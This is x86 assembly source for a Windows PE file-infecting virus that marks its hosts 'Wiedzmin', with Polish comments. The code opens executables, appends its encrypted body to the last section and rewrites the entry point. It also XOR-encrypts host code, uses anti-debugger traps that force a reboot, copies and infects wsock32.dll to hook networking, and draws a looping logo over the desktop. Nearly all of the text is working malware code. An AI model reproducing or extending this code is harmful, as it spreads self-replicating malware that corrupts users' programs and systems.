;------------------------------------------------------------------------------------------------
|
|||
|
;************************************************************************************************
|
|||
|
;INFECT EM GLOWZ !!!!
|
|||
|
;************************************************************************************************
|
|||
|
;------------------------------------------------------------------------------------------------
|
|||
|
;<##############################################################################################>
|
|||
|
|
|||
|
@infect:
|
|||
|
call @bad_name
|
|||
|
cmp edi,1
|
|||
|
jne _continue
|
|||
|
ret
|
|||
|
|
|||
|
@infect0:
|
|||
|
_continue:
|
|||
|
lea esi,[ebp+offset finddata.cFileName]
|
|||
|
|
|||
|
push esi
|
|||
|
call dword ptr [ebp+_GetFileAttributesA]
|
|||
|
mov dword ptr [ebp+fileAtrib],eax
|
|||
|
inc eax
|
|||
|
jz _Out
|
|||
|
|
|||
|
lea eax,[ebp+F1]
|
|||
|
push eax
|
|||
|
lea eax,[ebp+F2]
|
|||
|
push eax
|
|||
|
lea eax,[ebp+F3]
|
|||
|
push eax
|
|||
|
push dword ptr [ebp+fHnd]
|
|||
|
call dword ptr [ebp+_GetFileTime]
|
|||
|
|
|||
|
|
|||
|
push 00000080h
|
|||
|
push esi
|
|||
|
call dword ptr [_SetFileAttributesA+ebp] ; clean file
|
|||
|
cmp eax,0
|
|||
|
je _Out
|
|||
|
|
|||
|
;mov ecx,dword ptr [ebp+finddata.nFileSizeLow]
|
|||
|
;mov [ebp+offset memory],ecx
|
|||
|
|
|||
|
|
|||
|
;Ble otfieramy zeby miec handle
|
|||
|
xor eax,eax
|
|||
|
lea esi,[ebp+offset finddata.cFileName]
|
|||
|
push eax
|
|||
|
push 00000080h
|
|||
|
push 00000003h
|
|||
|
push eax
|
|||
|
push eax
|
|||
|
push 80000000h OR 40000000h
|
|||
|
push esi
|
|||
|
call dword ptr [ebp+_CreateFileA]
|
|||
|
mov edi,eax ;w edi handle
|
|||
|
inc eax
|
|||
|
jz _Out
|
|||
|
dec eax
|
|||
|
mov dword ptr [ebp+offset fileHandle],eax
|
|||
|
|
|||
|
|
|||
|
|
|||
|
_Oblicz:
|
|||
|
push 0
|
|||
|
push dword ptr [ebp+offset fileHandle]
|
|||
|
call dword ptr [ebp+_GetFileSize]
|
|||
|
mov dword ptr [ebp+fSize],eax
|
|||
|
inc eax
|
|||
|
jz _Out2
|
|||
|
dec eax
|
|||
|
mov dword ptr [ebp+finddata.nFileSizeLow],eax
|
|||
|
|
|||
|
mov ecx,dword ptr [ebp+fSize]
|
|||
|
call MapF
|
|||
|
|
|||
|
|
|||
|
mov ecx,dword ptr [ebp+fSize]
|
|||
|
call VMapF
|
|||
|
;w esi mamy maping tak jak z kernelem
|
|||
|
|
|||
|
_Check_PE:
|
|||
|
cmp word ptr [esi],'ZM'
|
|||
|
jne _Out3
|
|||
|
|
|||
|
mov ecx,[esi+3ch]
|
|||
|
cmp dword ptr [esi+ecx],'EP'
|
|||
|
jne _Out3
|
|||
|
|
|||
|
|
|||
|
add esi,ecx ;ESI => PE HEADER
|
|||
|
mov edi,esi
|
|||
|
|
|||
|
|
|||
|
_Saving:
|
|||
|
mov dword ptr [ebp+header],esi
|
|||
|
mov ecx,[esi+28h]
|
|||
|
mov dword ptr [ebp+hosteip],ecx
|
|||
|
mov ecx,[esi+3ch]
|
|||
|
mov dword ptr [ebp+align],ecx
|
|||
|
mov ecx,[esi+34h]
|
|||
|
mov dword ptr [ebp+imagebase],ecx
|
|||
|
mov ecx,[esi+38h] ;get section align value
|
|||
|
mov [ebp + _secAlign],ecx ;and save it
|
|||
|
|
|||
|
|
|||
|
|
|||
|
_Infecto0:
|
|||
|
cmp dword ptr [esi+4ch],"deiW"
|
|||
|
jz _No_infect
|
|||
|
|
|||
|
|
|||
|
|
|||
|
push dword ptr [esi+3Ch]
|
|||
|
|
|||
|
|
|||
|
|
|||
|
;***********************************************************************************************
|
|||
|
|
|||
|
mov eax,[ebp+offset fMapReal]
|
|||
|
push eax
|
|||
|
mov eax, [ebp+_UnmapViewOfFile]
|
|||
|
call eax
|
|||
|
|
|||
|
push dword ptr [ebp+fHndMap]
|
|||
|
call dword ptr [ebp+_CloseHandle]
|
|||
|
|
|||
|
|
|||
|
;mov eax,dword ptr [ebp+go_wsock]
|
|||
|
|
|||
|
|
|||
|
|
|||
|
mov eax,dword ptr [ebp+fSize] ; And Map all again.
|
|||
|
cmp dword ptr [ebp+go_wsock],1
|
|||
|
je @dodaj
|
|||
|
add eax,virussize+vvsize
|
|||
|
;add eax,vvsize
|
|||
|
jmp @nextt
|
|||
|
|
|||
|
@dodaj:add eax,hooksize
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
@nextt:
|
|||
|
pop ecx
|
|||
|
call Align_
|
|||
|
mov dword ptr [ebp+memory],eax
|
|||
|
|
|||
|
|
|||
|
mov ecx,eax
|
|||
|
call MapF
|
|||
|
|
|||
|
mov ecx,dword ptr [ebp+memory]
|
|||
|
call VMapF
|
|||
|
|
|||
|
cmp dword ptr [ebp+go_wsock],1
|
|||
|
je @0dal
|
|||
|
call @crypt_host
|
|||
|
cmp dword ptr [ebp+help_virus],1
|
|||
|
je _God
|
|||
|
|
|||
|
|
|||
|
@0dal:
|
|||
|
mov esi,[eax+3ch]
|
|||
|
add esi,eax ;ESI => PE HEADER
|
|||
|
mov edi,esi
|
|||
|
|
|||
|
|
|||
|
;************************************************************************************************
|
|||
|
|
|||
|
inc dword ptr [ebp+ic]
|
|||
|
|
|||
|
xor eax,eax
|
|||
|
mov ax,[esi + 06h] ;load number of sections
|
|||
|
mov ecx,28h ;28 bytes for each section header
|
|||
|
dec eax ;seeking for last,...
|
|||
|
mul ecx ;and mul it
|
|||
|
add esi,eax ; Normalize
|
|||
|
add esi,78h ; Ptr to dir table
|
|||
|
mov edx,[edi+74h] ; EDX = n<> of dir entries
|
|||
|
shl edx,3 ; EDX = EDX*8
|
|||
|
add esi,edx ; ESI = Ptr to last section
|
|||
|
|
|||
|
|
|||
|
mov edx,[esi+10h] ; EDX = SizeOfRawData
|
|||
|
mov ebx,edx ; EBX = EDX
|
|||
|
add edx,[esi+14h] ; EDX = EDX+PointerToRawData
|
|||
|
|
|||
|
push edx ; Preserve EDX
|
|||
|
|
|||
|
mov eax,ebx ; EAX = EBX
|
|||
|
add eax,[esi+0Ch] ; EAX = EAX+VA Address
|
|||
|
; EAX = New EIP
|
|||
|
;mov [edi+28h],eax ; Change the new EIP
|
|||
|
mov dword ptr [ebp+NewEIP],eax ; Also store it
|
|||
|
|
|||
|
cmp dword ptr [ebp+go_wsock],1
|
|||
|
je @infect_then
|
|||
|
|
|||
|
|
|||
|
mov eax,dword ptr [ebp+NewEIP]
|
|||
|
mov [edi+28h],eax
|
|||
|
|
|||
|
|
|||
|
@infect_then:
|
|||
|
mov eax,[esi+10h] ; EAX = new SizeOfRawData
|
|||
|
cmp dword ptr [ebp+go_wsock],1
|
|||
|
je @dallejj
|
|||
|
add eax,vvsize+virussize ; EAX = EAX+VirusSize
|
|||
|
jmp @nexttt
|
|||
|
|
|||
|
@dallejj: add eax,hooksize
|
|||
|
@nexttt:
|
|||
|
mov ecx,[edi+3Ch] ; ECX = FileAlignment
|
|||
|
call Align_ ; Align!
|
|||
|
|
|||
|
mov [esi+10h],eax ; New SizeOfRawData
|
|||
|
|
|||
|
mov [esi+08h],eax ; New VirtualSize
|
|||
|
|
|||
|
pop edx ; EDX = Raw pointer to the
|
|||
|
; end of section
|
|||
|
cmp dword ptr [ebp+go_wsock],1
|
|||
|
je @skip_thiss
|
|||
|
|
|||
|
mov eax,[esi+10h] ; EAX = New SizeOfRawData
|
|||
|
add eax,[esi+0Ch] ; EAX = EAX+VirtualAddress
|
|||
|
mov [edi+50h],eax ; EAX = New SizeOfImage
|
|||
|
|
|||
|
@skip_thiss:
|
|||
|
or dword ptr [esi+24h],0A0000020h
|
|||
|
|
|||
|
mov dword ptr [edi+4ch],"deiW" ;Wiedzmin here ;)
|
|||
|
|
|||
|
lea esi,[ebp+v_start] ; ESI = Ptr to virus_start
|
|||
|
xchg edi,edx ; EDI = Raw ptr after last
|
|||
|
mov dword ptr [ebp+moj_address],edi
|
|||
|
|
|||
|
; section
|
|||
|
add edi,dword ptr [ebp+fMapReal] ;EDI = Normalized ptr
|
|||
|
mov ecx,virussize ;ECX = Size to copy
|
|||
|
|
|||
|
|
|||
|
cmp dword ptr [ebp+go_wsock],1
|
|||
|
jne @write_it
|
|||
|
mov ecx,hooksize
|
|||
|
|
|||
|
|
|||
|
lea esi,[ebp+start_h]
|
|||
|
|
|||
|
|
|||
|
@write_it:
|
|||
|
|
|||
|
cmp dword ptr [ebp+go_wsock],1
|
|||
|
je step_0
|
|||
|
call @crypt_my_body
|
|||
|
jmp step_1
|
|||
|
step_0: rep movsb ;Do it!
|
|||
|
|
|||
|
|
|||
|
step_1:
|
|||
|
cmp dword ptr [ebp+go_wsock],1
|
|||
|
jne _Git
|
|||
|
ret
|
|||
|
|
|||
|
_Git:
|
|||
|
jmp _God
|
|||
|
|
|||
|
|
|||
|
_No_infect:
|
|||
|
cmp dword ptr [ebp+go_wsock],1
|
|||
|
jne @zw
|
|||
|
mov edx,-1
|
|||
|
jmp _God
|
|||
|
|
|||
|
@zw:
|
|||
|
mov ecx,dword ptr [ebp+finddata.nFileSizeLow]
|
|||
|
call @zostaf
|
|||
|
dec dword ptr [ebp+ic]
|
|||
|
|
|||
|
|
|||
|
_God:
|
|||
|
|
|||
|
mov eax,[ebp+offset fMapReal]
|
|||
|
push eax
|
|||
|
mov eax, [ebp+_UnmapViewOfFile]
|
|||
|
call eax
|
|||
|
|
|||
|
|
|||
|
|
|||
|
_Out3:
|
|||
|
push dword ptr [ebp+fHndMap]
|
|||
|
call dword ptr [ebp+_CloseHandle]
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
_Out2:
|
|||
|
lea eax,[ebp+F1]
|
|||
|
push eax
|
|||
|
lea eax,[ebp+F2]
|
|||
|
push eax
|
|||
|
lea eax,[ebp+F3]
|
|||
|
push eax
|
|||
|
push dword ptr [ebp+fHnd]
|
|||
|
call dword ptr [ebp+_SetFileTime]
|
|||
|
|
|||
|
push dword ptr [ebp+offset fileHandle]
|
|||
|
call dword ptr [ebp+_CloseHandle]
|
|||
|
|
|||
|
cmp dword ptr [ebp+go_wsock],1
|
|||
|
je @@@z
|
|||
|
push 1
|
|||
|
lea eax,[ebp+santa]
|
|||
|
push eax
|
|||
|
lea eax,[ebp+finddata.cFileName]
|
|||
|
push eax
|
|||
|
call dword ptr [ebp+_CopyFileA]
|
|||
|
|
|||
|
@@@z:
|
|||
|
;&resetore the attributez
|
|||
|
push dword ptr [ebp+fileAtrib]
|
|||
|
lea eax,[ebp+finddata.cFileName]
|
|||
|
push eax
|
|||
|
call dword ptr [ebp+_SetFileAttributesA]
|
|||
|
mov edx,-1
|
|||
|
|
|||
|
|
|||
|
_Out:
|
|||
|
|
|||
|
ret
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Align_:
|
|||
|
push edx
|
|||
|
xor edx,edx
|
|||
|
push eax
|
|||
|
div ecx
|
|||
|
pop eax
|
|||
|
sub ecx,edx
|
|||
|
add eax,ecx
|
|||
|
pop edx
|
|||
|
ret
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
@zostaf:
|
|||
|
xor eax,eax
|
|||
|
push eax
|
|||
|
push eax
|
|||
|
push ecx
|
|||
|
push dword ptr [ebp+fileHandle]
|
|||
|
call dword ptr [ebp+offset _SetFilePointer]
|
|||
|
|
|||
|
push dword ptr [ebp+fileHandle]
|
|||
|
call dword ptr [ebp+offset _SetEndOfFile]
|
|||
|
ret
|
|||
|
|
|||
|
;**************************
|
|||
|
;ECX - size to map
|
|||
|
;**************************
|
|||
|
MapF:
|
|||
|
xor eax,eax
|
|||
|
push eax
|
|||
|
push ecx
|
|||
|
push eax
|
|||
|
push 00000004h
|
|||
|
push eax
|
|||
|
push dword ptr [ebp+fileHandle]
|
|||
|
call dword ptr [ebp+_CreateFileMappingA]
|
|||
|
cmp eax,0
|
|||
|
je _Out2
|
|||
|
mov dword ptr [ebp+fHndMap],eax
|
|||
|
ret
|
|||
|
|
|||
|
|
|||
|
VMapF:
|
|||
|
xor eax,eax
|
|||
|
push ecx
|
|||
|
push eax
|
|||
|
push eax
|
|||
|
push 00000004h OR 00000002h
|
|||
|
push dword ptr [ebp+fHndMap]
|
|||
|
call dword ptr [ebp+_MapViewOfFile]
|
|||
|
cmp eax,0
|
|||
|
je _Out3
|
|||
|
mov dword ptr [ebp+fMapReal],eax
|
|||
|
mov esi,eax
|
|||
|
ret
|
|||
|
|
|||
|
@TRY_RELOC:
|
|||
|
ret
|
|||
|
|
|||
|
@debug_trap: ;ret
|
|||
|
call dword ptr [ebp+_IsDebuggerPresent]
|
|||
|
or eax,eax
|
|||
|
jz _leave_me
|
|||
|
ble: mov eax, 909119cdh ;int 19h!
|
|||
|
jmp $ - 4
|
|||
|
|
|||
|
|
|||
|
_leave_me:
|
|||
|
lea eax,[ebp+sice9x]
|
|||
|
push 00000000h
|
|||
|
push 00000080h
|
|||
|
push 00000003h
|
|||
|
push 00000000h
|
|||
|
push 00000001h
|
|||
|
push 0C0000000h
|
|||
|
push eax
|
|||
|
call dword ptr [ebp+_CreateFileA]
|
|||
|
|
|||
|
inc eax
|
|||
|
jz leave_it
|
|||
|
dec eax
|
|||
|
|
|||
|
push eax
|
|||
|
call dword ptr [ebp+_CloseHandle]
|
|||
|
|
|||
|
lea eax,[ebp+to_ja]
|
|||
|
push eax
|
|||
|
call dword ptr [ebp+_OutputDebugStringA]
|
|||
|
mov eax, 909119cdh ;int 19h!
|
|||
|
jmp $ - 4
|
|||
|
jmp @EXIT
|
|||
|
|
|||
|
leave_it: ret
|
|||
|
|
|||
|
|
|||
|
|
|||
|
;************************************************************************************************
|
|||
|
;PayL0ad ;]
|
|||
|
;this is very simple coz i don't have any time to make it perfect
|
|||
|
;************************************************************************************************
|
|||
|
payload:
|
|||
|
p_x dd 0
|
|||
|
p_y dd 0
|
|||
|
|
|||
|
hdc dd 0
|
|||
|
wh dd 0
|
|||
|
|
|||
|
screen_x dd 0
|
|||
|
screen_y dd 0
|
|||
|
|
|||
|
|
|||
|
font dd 0
|
|||
|
|
|||
|
|
|||
|
color: dd 15466513
|
|||
|
dd 15474944
|
|||
|
dd 15484928
|
|||
|
dd 15496448
|
|||
|
|
|||
|
|
|||
|
|
|||
|
make_it_real:
|
|||
|
pay:
|
|||
|
|
|||
|
lea esi,[ebp+@GDI_APIZ]
|
|||
|
lea edi,[ebp+@GDI_APIZA]
|
|||
|
lea ebx,[ebp+gdi32]
|
|||
|
|
|||
|
change_l:
|
|||
|
push ebx
|
|||
|
call dword ptr [ebp+_LoadLibraryA]
|
|||
|
mov ebx,eax
|
|||
|
|
|||
|
|
|||
|
@find_a:
|
|||
|
push esi
|
|||
|
push ebx
|
|||
|
call dword ptr [ebp+_GPA]
|
|||
|
stosd
|
|||
|
|
|||
|
check_a:
|
|||
|
inc esi
|
|||
|
cmp byte ptr [esi],0
|
|||
|
jne check_a
|
|||
|
|
|||
|
inc esi
|
|||
|
cmp byte ptr [esi],77h
|
|||
|
je change_ll
|
|||
|
|
|||
|
cmp byte ptr [esi],69h
|
|||
|
je @go_pay
|
|||
|
|
|||
|
jmp @find_a
|
|||
|
|
|||
|
|
|||
|
change_ll: inc esi
|
|||
|
lea ebx,[ebp+user32]
|
|||
|
jmp change_l
|
|||
|
|
|||
|
|
|||
|
@go_pay:
|
|||
|
|
|||
|
|
|||
|
push 1
|
|||
|
call dword ptr [ebp+_GetSystemMetrics] ;user
|
|||
|
mov dword ptr [ebp+screen_y],eax
|
|||
|
|
|||
|
push 0
|
|||
|
call dword ptr [ebp+_GetSystemMetrics] ;user
|
|||
|
mov dword ptr [ebp+screen_x],eax
|
|||
|
|
|||
|
call c_font
|
|||
|
lea esi,logo
|
|||
|
xor ebx,ebx
|
|||
|
|
|||
|
l:
|
|||
|
call dword ptr [ebp+_GetDesktopWindow] ;user
|
|||
|
mov dword ptr [ebp+wh],eax
|
|||
|
|
|||
|
push dword ptr [ebp+wh]
|
|||
|
call dword ptr [ebp+_GetWindowDC] ;user
|
|||
|
mov dword ptr [ebp+hdc],eax
|
|||
|
|
|||
|
call draww
|
|||
|
|
|||
|
push dword ptr [ebp+hdc]
|
|||
|
push dword ptr [ebp+wh]
|
|||
|
call dword ptr [ebp+_ReleaseDC] ;user
|
|||
|
|
|||
|
jmp l
|
|||
|
|
|||
|
draww:
|
|||
|
xor eax,eax
|
|||
|
lodsb
|
|||
|
lea edi,[ebp+jed]
|
|||
|
stosb
|
|||
|
cmp al,0
|
|||
|
jne @wypisz
|
|||
|
lea esi,[ebp+logo]
|
|||
|
lodsb
|
|||
|
lea edi,[ebp+jed]
|
|||
|
stosb
|
|||
|
|
|||
|
@wypisz:
|
|||
|
cmp al,'i'
|
|||
|
jne @dik
|
|||
|
add dword ptr [ebp+p_x],6
|
|||
|
|
|||
|
@dik:
|
|||
|
push dword ptr [ebp+font]
|
|||
|
push dword ptr [ebp+hdc]
|
|||
|
call dword ptr [ebp+_SelectObject] ;gdi
|
|||
|
|
|||
|
push 0
|
|||
|
push dword ptr [ebp+hdc]
|
|||
|
call dword ptr [ebp+_SetBkMode] ;gdi
|
|||
|
|
|||
|
mov eax,dword ptr [ebp+color+ebx]
|
|||
|
add ebx,4
|
|||
|
cmp ebx,4*4
|
|||
|
jl @n1
|
|||
|
xor ebx,ebx
|
|||
|
|
|||
|
@n1:
|
|||
|
push eax
|
|||
|
push dword ptr [ebp+hdc]
|
|||
|
call dword ptr [ebp+_SetTextColor] ;gdi
|
|||
|
|
|||
|
push 1
|
|||
|
lea eax,[ebp+jed]
|
|||
|
push eax
|
|||
|
push dword ptr [ebp+p_y]
|
|||
|
push dword ptr [ebp+p_x]
|
|||
|
push dword ptr [ebp+hdc]
|
|||
|
call dword ptr [ebp+_TextOutA] ;gdi
|
|||
|
|
|||
|
mov eax,dword ptr [ebp+screen_y]
|
|||
|
cmp dword ptr [ebp+p_y],eax
|
|||
|
jae chang_g
|
|||
|
mov eax,dword ptr [ebp+screen_x]
|
|||
|
add dword ptr [ebp+p_x],13
|
|||
|
cmp dword ptr [ebp+p_x],eax
|
|||
|
jle spp
|
|||
|
mov dword ptr [ebp+p_x],0
|
|||
|
add dword ptr [ebp+p_y],15
|
|||
|
jmp spp
|
|||
|
|
|||
|
chang_g: mov dword ptr [ebp+p_y],0
|
|||
|
|
|||
|
spp:
|
|||
|
push 50
|
|||
|
call dword ptr [ebp+_Sleep]
|
|||
|
ret
|
|||
|
|
|||
|
c_font:
|
|||
|
push offset famil
|
|||
|
xor eax,eax
|
|||
|
push eax
|
|||
|
push eax
|
|||
|
push eax
|
|||
|
push eax
|
|||
|
push eax
|
|||
|
push eax
|
|||
|
push eax
|
|||
|
push eax
|
|||
|
push eax
|
|||
|
push eax
|
|||
|
push eax
|
|||
|
push 9
|
|||
|
push 9
|
|||
|
call dword ptr [ebp+_CreateFontA] ;gdi
|
|||
|
mov [font],eax
|
|||
|
ret
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
@GDI_APIZ: db "CreateFontA",0
|
|||
|
db "TextOutA",0
|
|||
|
db "SetBkMode",0
|
|||
|
db "SetTextColor",0
|
|||
|
db "SelectObject",0
|
|||
|
db 77h
|
|||
|
db "GetSystemMetrics",0 ;user32 part X-D
|
|||
|
db "GetDesktopWindow",0
|
|||
|
db "GetWindowDC",0
|
|||
|
db "ReleaseDC",0
|
|||
|
db 69h
|
|||
|
|
|||
|
|
|||
|
;************************************************************************************************
|
|||
|
;Handle this sucker ;]
|
|||
|
;************************************************************************************************
|
|||
|
@crypt_host:
|
|||
|
;push dword ptr [ebp+key_next]
|
|||
|
pushad
|
|||
|
|
|||
|
mov eax,dword ptr [ebp+fMapReal]
|
|||
|
mov esi,[eax+3ch]
|
|||
|
add esi,eax ;ESI => PE HEADER
|
|||
|
mov edi,esi
|
|||
|
|
|||
|
xor eax,eax
|
|||
|
mov ax,[esi + 06h] ;load number of sections
|
|||
|
mov ecx,0h ;28 bytes for each section header
|
|||
|
|
|||
|
add esi,ecx ; Normalize
|
|||
|
add esi,78h ; Ptr to dir table
|
|||
|
mov edx,[edi+74h] ; EDX = n<> of dir entries
|
|||
|
shl edx,3 ; EDX = EDX*8
|
|||
|
add esi,edx ; ESI = Ptr to last section
|
|||
|
|
|||
|
mov ecx,[edi+28h]
|
|||
|
|
|||
|
search_it:
|
|||
|
mov ebx,dword ptr [esi+0ch]
|
|||
|
add ebx,dword ptr [esi+08h]
|
|||
|
|
|||
|
|
|||
|
|
|||
|
inc eax
|
|||
|
cmp ecx,ebx
|
|||
|
jb sfound
|
|||
|
dec eax
|
|||
|
jz @e_error
|
|||
|
add esi,28h
|
|||
|
jmp search_it
|
|||
|
|
|||
|
sfound:
|
|||
|
test dword ptr [esi+24h],10000000h ;check section atributes
|
|||
|
jnz @e_error
|
|||
|
or dword ptr [esi+24h],0A0000020h
|
|||
|
|
|||
|
cmp dword ptr [esi],'xet.'
|
|||
|
je _01
|
|||
|
cmp dword ptr [esi],'EDOC'
|
|||
|
je _01
|
|||
|
mov dword ptr [ebp+help_virus],1
|
|||
|
|
|||
|
|
|||
|
|
|||
|
_01:
|
|||
|
push eax
|
|||
|
;STEP GET RAW ADDRESS
|
|||
|
|
|||
|
mov edx,ecx
|
|||
|
sub edx,dword ptr [esi+0ch] ;IMAGEBASE - VIRTUAL RVA=0
|
|||
|
add edx,[esi+014h] ;ADD RAW OFFSET
|
|||
|
mov dword ptr [ebp+e_where],edx
|
|||
|
|
|||
|
push edx
|
|||
|
mov edx,[esi+010h]
|
|||
|
mov dword ptr [ebp+e_bytes],edx
|
|||
|
pop edx
|
|||
|
|
|||
|
add edx,dword ptr [ebp+fMapReal] ;WHERE TO CRYPT!
|
|||
|
|
|||
|
mov ecx,[esi+10h]
|
|||
|
mov dword ptr [ebp+e_god],0
|
|||
|
|
|||
|
mov dword ptr [ebp+firstk],1h
|
|||
|
|
|||
|
pushad
|
|||
|
|
|||
|
lea edi,[ebp+key_next]
|
|||
|
|
|||
|
call @GGEN_KEY
|
|||
|
call @combine_key
|
|||
|
|
|||
|
mov eax,dword ptr [ebp+key_next]
|
|||
|
|
|||
|
popad
|
|||
|
mov dword ptr [ebp+firstk],0
|
|||
|
|
|||
|
push esi
|
|||
|
mov eax,dword ptr [ebp+key_next]
|
|||
|
xor ebx,ebx
|
|||
|
|
|||
|
|
|||
|
@loop_it:
|
|||
|
;=> IF 5 BYTES ARE ZEROZ THEN THE DON't CRYPT BELOW
|
|||
|
cmp byte ptr [edx],00h
|
|||
|
jne @go_
|
|||
|
cmp byte ptr [edx+1],00h
|
|||
|
jne @go_
|
|||
|
cmp byte ptr [edx+2],00h
|
|||
|
jne @go_
|
|||
|
cmp byte ptr [edx+3],00h
|
|||
|
jne @go_
|
|||
|
cmp byte ptr [edx+4],00h
|
|||
|
je @crypted
|
|||
|
|
|||
|
|
|||
|
@go_:
|
|||
|
xor byte ptr [edx],al
|
|||
|
|
|||
|
inc edx
|
|||
|
loop @loop_it
|
|||
|
jmp @e_out
|
|||
|
|
|||
|
@crypted:
|
|||
|
pop esi
|
|||
|
mov eax,dword ptr [ebp+e_bytes]
|
|||
|
sub eax,ecx
|
|||
|
mov dword ptr [ebp+e_bytes],eax
|
|||
|
|
|||
|
jmp @e_out
|
|||
|
|
|||
|
|
|||
|
@e_error:
|
|||
|
|
|||
|
|
|||
|
@e_out:
|
|||
|
pop eax
|
|||
|
cmp dword ptr [ebp+help_virus],1
|
|||
|
je @mute_other_virus
|
|||
|
popad
|
|||
|
ret
|
|||
|
|
|||
|
;ENTRY: EDI - BUFFER
|
|||
|
@combine_key:
|
|||
|
mov eax,dword ptr [ebp+key2]
|
|||
|
stosd
|
|||
|
add eax,dword ptr [ebp+key]
|
|||
|
lea edi,[ebp+key_main]
|
|||
|
stosd
|
|||
|
ret
|
|||
|
|
|||
|
;**************************************************************************
|
|||
|
;UNCRYPT *|*
|
|||
|
;**************************************************************************
|
|||
|
@uncrypt:
|
|||
|
|
|||
|
call delta_e
|
|||
|
delta_e: pop ebp
|
|||
|
sub ebp,offset delta_e
|
|||
|
|
|||
|
pushad
|
|||
|
mov edx,dword ptr [ebp+imagebase]
|
|||
|
add edx,dword ptr [ebp+hosteip]
|
|||
|
|
|||
|
mov ecx,dword ptr [ebp+e_bytes]
|
|||
|
|
|||
|
xor ebx,ebx
|
|||
|
mov eax,[ebp+key_next]
|
|||
|
|
|||
|
@lloop_it:
|
|||
|
xor byte ptr [edx],al
|
|||
|
inc edx
|
|||
|
loop @lloop_it
|
|||
|
|
|||
|
f_e:
|
|||
|
cmp dword ptr [ebp+czy_je],0
|
|||
|
jne @helper_endd
|
|||
|
popad
|
|||
|
ret
|
|||
|
|
|||
|
@helper_endd:
|
|||
|
popad
|
|||
|
|
|||
|
mov eax,dword ptr [ebp+hosteip]
|
|||
|
add eax,dword ptr [ebp+imagebase]
|
|||
|
jmp eax
|
|||
|
|
|||
|
|
|||
|
czy_je dd 0
|
|||
|
e_bytes dd 0
|
|||
|
e_where dd 0
|
|||
|
e_god dd 0
|
|||
|
|
|||
|
|
|||
|
hosteip dd 0
|
|||
|
imagebase dd 0
|
|||
|
key_next dd 0
|
|||
|
|
|||
|
|
|||
|
@helper_end: nop
|
|||
|
|
|||
|
;***********************************************************
|
|||
|
@mute_other_virus:
|
|||
|
mov eax,dword ptr [ebp+fMapReal]
|
|||
|
mov esi,[eax+3ch]
|
|||
|
add esi,eax ;ESI => PE HEADER
|
|||
|
mov edi,esi
|
|||
|
|
|||
|
xor eax,eax
|
|||
|
mov ax,[esi + 06h] ;load number of sections
|
|||
|
mov ecx,28h ;28 bytes for each section header
|
|||
|
dec eax ;seeking for last,...
|
|||
|
mul ecx ;and mul it
|
|||
|
add esi,eax ; Normalize
|
|||
|
add esi,78h ; Ptr to dir table
|
|||
|
mov edx,[edi+74h] ; EDX = n<> of dir entries
|
|||
|
shl edx,3 ; EDX = EDX*8
|
|||
|
add esi,edx ; ESI = Ptr to last section
|
|||
|
|
|||
|
mov edx,[esi+10h] ; EDX = SizeOfRawData
|
|||
|
mov ebx,edx ; EBX = EDX
|
|||
|
add edx,[esi+14h] ; EDX = EDX+PointerToRawData
|
|||
|
|
|||
|
push edx ; Preserve EDX
|
|||
|
|
|||
|
mov eax,ebx ; EAX = EBX
|
|||
|
add eax,[esi+0Ch] ; EAX = EAX+VA Address
|
|||
|
; EAX = New EIP
|
|||
|
mov [edi+28h],eax ; Change the new EIP
|
|||
|
mov dword ptr [ebp+NewEIP],eax ; Also store it
|
|||
|
|
|||
|
|
|||
|
mov eax,dword ptr [ebp+fSize]
|
|||
|
add eax,helper
|
|||
|
mov ecx,[edi+3Ch]
|
|||
|
call Align_
|
|||
|
|
|||
|
mov [esi+10h],eax
|
|||
|
mov [esi+08h],eax
|
|||
|
|
|||
|
pop edx
|
|||
|
|
|||
|
mov eax,[esi+10h]
|
|||
|
add eax,[esi+0Ch]
|
|||
|
mov [edi+50h],eax
|
|||
|
|
|||
|
lea esi,[ebp+@uncrypt] ; ESI = Ptr to virus_start
|
|||
|
xchg edi,edx ; EDI = Raw ptr after last
|
|||
|
add edi,dword ptr [ebp+fMapReal] ;EDI = Normalized ptr
|
|||
|
mov ecx,helper
|
|||
|
mov dword ptr [ebp+czy_je],1
|
|||
|
rep movsb
|
|||
|
|
|||
|
push dword ptr [ebp+offset fMapReal]
|
|||
|
call dword ptr [ebp+_UnmapViewOfFile]
|
|||
|
|
|||
|
push dword ptr [ebp+fHndMap]
|
|||
|
call dword ptr [ebp+_CloseHandle]
|
|||
|
|
|||
|
mov ecx,dword ptr [ebp+fSize]
|
|||
|
add ecx,helper
|
|||
|
call @zostaf
|
|||
|
|
|||
|
|
|||
|
push dword ptr [ebp+fHnd]
|
|||
|
call dword ptr [ebp+_CloseHandle]
|
|||
|
|
|||
|
popad
|
|||
|
ret
|
|||
|
|
|||
|
|
|||
|
;************************************************************************************************
|
|||
|
;Wsock32 hooker!!!
|
|||
|
;************************************************************************************************
|
|||
|
@wsockz:
|
|||
|
mov eax,dword ptr [ebp+_GetSystemDirectoryA]
|
|||
|
mov ebx,dword ptr [ebp+_GPA]
|
|||
|
|
|||
|
push 260
|
|||
|
lea eax,[ebp+sysDIR]
|
|||
|
push eax
|
|||
|
call dword ptr [ebp+_GetSystemDirectoryA]
|
|||
|
|
|||
|
lea eax,[ebp+offset winDIRr]
|
|||
|
push 260
|
|||
|
push eax
|
|||
|
call dword ptr [ebp+_GetWindowsDirectoryA]
|
|||
|
|
|||
|
|
|||
|
|
|||
|
lea edi,[ebp+sysDIR]
|
|||
|
lea esi,[ebp+wsock]
|
|||
|
call strcat
|
|||
|
|
|||
|
lea edi,[ebp+winDIRr]
|
|||
|
lea esi,[ebp+nowe]
|
|||
|
call strcat
|
|||
|
|
|||
|
push 1
|
|||
|
lea eax,[ebp+winDIRr]
|
|||
|
push eax
|
|||
|
lea eax,[ebp+sysDIR]
|
|||
|
push eax
|
|||
|
call dword ptr [ebp+_CopyFileA]
|
|||
|
cmp eax,0
|
|||
|
je bye
|
|||
|
|
|||
|
|
|||
|
lea edi,[ebp+finddata.cFileName]
|
|||
|
lea esi,[ebp+winDIRr]
|
|||
|
call strcat
|
|||
|
|
|||
|
|
|||
|
mov dword ptr [ebp+go_wsock],1
|
|||
|
|
|||
|
push dword ptr [ebp+hosteip]
|
|||
|
push dword ptr [ebp+imagebase]
|
|||
|
call @infect
|
|||
|
pop dword ptr [ebp+imagebase]
|
|||
|
pop dword ptr [ebp+hosteip]
|
|||
|
